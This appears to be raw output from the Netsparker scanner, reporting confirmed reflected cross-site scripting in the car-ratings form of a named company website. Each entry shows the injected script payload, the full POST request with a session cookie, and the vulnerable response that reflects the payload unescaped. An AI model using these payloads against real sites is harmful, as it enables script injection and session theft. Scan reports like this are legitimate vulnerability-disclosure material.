<!-- Start the content -->
<div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Automotive Ratings</div>
<div class="pagetext">

<p>Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p>
<p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."</p>

<p class="boldtext">View the top winners</p>
<ul>
<li><a href="auto_tqa_winners.php">Total Quality Winners</a></li>
<!-- <li><a href="auto_tva_winners.php">Total Value Winners</a></li> -->
<!--<li><a href="auto_mdv_winners.php">Most Delightful Winners</a></li>-->
<!--<li><a href="auto_pim_winners.php">Problem Impact Measure Winners</a></li>-->
</ul>

<div id="fieldset">
<div class="pagetitle_small">Select a car</div>
<form name="ratingsSelection" action="ratings.php" method="post">
<table border="0" cellpadding="2" cellspacing="0" class="text">
<tr>
<td width="65">Year</td>
<td width="135">Manufacturer</td>
<td colspan="2" width="200">Model</td>
</tr>
<tr>
<td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td> </tr>
</table>

<div class="pagesubtitle">Cars you have selected</div>

<input type="hidden" name="numCars" id="numCars" size="1" value="3" />

<input type="hidden" name="yr1" id="yr1" value="3" />
<input type="hidden" name="mk1" id="mk1" value="'"--></style></script><script>netsparker(0x000A1B)</script>" />
<input type="hidden" name="mo1" id="mo1" value="3" />

<input type="hidden" name="yr2" id="yr2" value="3" />
<input type="hidden" name="mk2" id="mk2" value="3" />
<input type="hidden" name="mo2" id="mo2" value="3" />

<input type="hidden" name="yr3" id="yr3" value="" />
<input type="hidden" name="mk3" id="mk3" value="" />
<input type="hidden" name="mo3" id="mo3" value="" />

<input type="hidden" name="yr4" id="yr4" value="" />
<input type="hidden" name="mk4" id="mk4" value="" />
<input type="hidden" name="mo4" id="mo4" value="" />

<input type="hidden" name="yr5" id="yr5" value="" />
<input type="hidden" name="mk5" id="mk5" value="" />
<input type="hidden" name="mo5" id="mo5" value="" />

</form>

<table border="0" class="text boldtext">
<tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>2.</td><td><span id="car2"></span></td><td><span id="car2remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(2);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>3.</td><td><span id="car3"></span></td><td><span id="car3remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(3);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>4.</td><td><span id="car4"></span></td><td><span id="car4remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(4);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>5.</td><td><span id="car5"></span>..
- /ratings.php

/ratings.php CONFIRMED

http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST '"--></style></script><script>alert(0x000A1C)</script>
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 183
Expect: 100-continue
Accept-Encoding: gzip, deflate

numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000A1C)%3c%2fscript%3e&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:45:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Vision - Automotive Ratings</title>
<script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script>
<!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div>
<table width="100%" class="text" cellpadding="5">
<tr>
<td width="150" align="left" valign="top"><div class="sidemenu_head">RESEARCH</div><div class="sidemenu_item"><a href="research.php">Overview</a></div><div class="sidemenu_item"> <a href="auto_research.php">Automotive</a></div><div class="sidemenu_item"><a href="govt_research.php">Government</a></div><div class="sidemenu_item"><a href="jury_research.php">Jury</a></div><div class="sidemenu_item"><a href="org_intervention.php">Organizational Intervention</a></div><div class="sidemenu_item"><a href="via_research.php">Values In America</a></div><div class="sidemenu_item"><a href="method.php">ValueCentered Method</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td>
<td align="left" valign="top">
<!-- Start the content -->
<div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Automotive Ratings</div>
<div class="pagetext">

<p>Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p>
<p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."</p>

<p class="boldtext">View the top winners</p>
<ul>
<li><a href="auto_tqa_winners.php">Total Quality Winners</a></li>
<!-- <li><a href="auto_tva_winners.php">Total Value Winners</a></li> -->
<!--<li><a href="auto_mdv_winners.php">Most Delightful Winners</a></li>-->
<!--<li><a href="auto_pim_winners.php">Problem Impact Measure Winners</a></li>-->
</ul>

<div id="fieldset">
<div class="pagetitle_small">Select a car</div>
<form name="ratingsSelection" action="ratings.php" method="post">
<table border="0" cellpadding="2" cellspacing="0" class="text">
<tr>
<td width="65">Year</td>
<td width="135">Manufacturer</td>
<td colspan="2" width="200">Model</td>
</tr>
<tr>
<td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td> </tr>
</table>

<div class="pagesubtitle">Cars you have selected</div>

<input type="hidden" name="numCars" id="numCars" size="1" value="3" />

<input type="hidden" name="yr1" id="yr1" value="3" />
<input type="hidden" name="mk1" id="mk1" value="3" />
<input type="hidden" name="mo1" id="mo1" value="'"--></style></script><script>netsparker(0x000A1C)</script>" />

<input type="hidden" name="yr2" id="yr2" value="3" />
<input type="hidden" name="mk2" id="mk2" value="3" />
<input type="hidden" name="mo2" id="mo2" value="3" />

<input type="hidden" name="yr3" id="yr3" value="" />
<input type="hidden" name="mk3" id="mk3" value="" />
<input type="hidden" name="mo3" id="mo3" value="" />

<input type="hidden" name="yr4" id="yr4" value="" />
<input type="hidden" name="mk4" id="mk4" value="" />
<input type="hidden" name="mo4" id="mo4" value="" />

<input type="hidden" name="yr5" id="yr5" value="" />
<input type="hidden" name="mk5" id="mk5" value="" />
<input type="hidden" name="mo5" id="mo5" value="" />

</form>

<table border="0" class="text boldtext">
<tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>2.</td><td><span id="car2"></span></td><td><span id="car2remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(2);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>3.</td><td><span id="car3"></span></td><td><span id="car3remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(3);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>4.</td><td><span id="car4"></span></td><td><span id="car4remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(4);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>5.</td><td><span id="car5"></span>..
- /ratings.php

/ratings.php CONFIRMED

http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST '"--></style></script><script>alert(0x000A53)</script>
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 183
Expect: 100-continue
Accept-Encoding: gzip, deflate

numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000A53)%3c%2fscript%3e&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:45:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Vision - Automotive Ratings</title>
<script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script>
<!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div>
<table width="100%" class="text" cellpadding="5">
<tr>
<td width="150" align="left" valign="top"><div class="sidemenu_head">RESEARCH</div><div class="sidemenu_item"><a href="research.php">Overview</a></div><div class="sidemenu_item"> <a href="auto_research.php">Automotive</a></div><div class="sidemenu_item"><a href="govt_research.php">Government</a></div><div class="sidemenu_item"><a href="jury_research.php">Jury</a></div><div class="sidemenu_item"><a href="org_intervention.php">Organizational Intervention</a></div><div class="sidemenu_item"><a href="via_research.php">Values In America</a></div><div class="sidemenu_item"><a href="method.php">ValueCentered Method</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td>
<td align="left" valign="top">
<!-- Start the content -->
<div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Automotive Ratings</div>
<div class="pagetext">

<p>Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p>
<p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."</p>

<p class="boldtext">View the top winners</p>
<ul>
<li><a href="auto_tqa_winners.php">Total Quality Winners</a></li>
<!-- <li><a href="auto_tva_winners.php">Total Value Winners</a></li> -->
<!--<li><a href="auto_mdv_winners.php">Most Delightful Winners</a></li>-->
<!--<li><a href="auto_pim_winners.php">Problem Impact Measure Winners</a></li>-->
</ul>

<div id="fieldset">
<div class="pagetitle_small">Select a car</div>
<form name="ratingsSelection" action="ratings.php" method="post">
<table border="0" cellpadding="2" cellspacing="0" class="text">
<tr>
<td width="65">Year</td>
<td width="135">Manufacturer</td>
<td colspan="2" width="200">Model</td>
</tr>
<tr>
<td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td> </tr>
</table>

<div class="pagesubtitle">Cars you have selected</div>

<input type="hidden" name="numCars" id="numCars" size="1" value="3" />

<input type="hidden" name="yr1" id="yr1" value="3" />
<input type="hidden" name="mk1" id="mk1" value="3" />
<input type="hidden" name="mo1" id="mo1" value="3" />

<input type="hidden" name="yr2" id="yr2" value="'"--></style></script><script>netsparker(0x000A53)</script>" />
<input type="hidden" name="mk2" id="mk2" value="3" />
<input type="hidden" name="mo2" id="mo2" value="3" />

<input type="hidden" name="yr3" id="yr3" value="" />
<input type="hidden" name="mk3" id="mk3" value="" />
<input type="hidden" name="mo3" id="mo3" value="" />

<input type="hidden" name="yr4" id="yr4" value="" />
<input type="hidden" name="mk4" id="mk4" value="" />
<input type="hidden" name="mo4" id="mo4" value="" />

<input type="hidden" name="yr5" id="yr5" value="" />
<input type="hidden" name="mk5" id="mk5" value="" />
<input type="hidden" name="mo5" id="mo5" value="" />

</form>

<table border="0" class="text boldtext">
<tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>2.</td><td><span id="car2"></span></td><td><span id="car2remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(2);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>3.</td><td><span id="car3"></span></td><td><span id="car3remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(3);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>4.</td><td><span id="car4"></span></td><td><span id="car4remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(4);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>5.</td><td><span id="car5"></span>..
- /ratings.php

/ratings.php CONFIRMED

http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST '"--></style></script><script>alert(0x000A54)</script>
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 183
Expect: 100-continue
Accept-Encoding: gzip, deflate

numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000A54)%3c%2fscript%3e&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:45:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Vision - Automotive Ratings</title>
<script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script>
<!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a 